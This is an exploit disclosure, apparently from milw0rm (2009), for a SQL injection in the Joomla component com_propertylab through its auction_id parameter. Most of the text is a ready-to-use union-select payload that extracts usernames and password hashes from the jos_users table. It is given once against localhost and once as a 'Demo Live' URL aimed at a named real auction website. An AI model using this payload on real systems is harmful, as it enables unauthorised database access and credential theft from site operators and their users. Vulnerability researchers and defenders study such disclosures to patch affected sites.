-------------------------------------------------------------------------- Joomla Component com_propertylab (auction_id) SQL injection Vulnerability -------------------------------------------------------------------------- ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Group : LatinHackTeam [+] Vulnerability : SQL injection ################################################### Example: http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26 : +and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users Demo Live (1): http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users Thanks for all Str0ke and you are unbeatable :) +++++++++++++++++++++++++++++++++ [!] Produced in South America --------------------------------- # milw0rm.com [2009-07-10]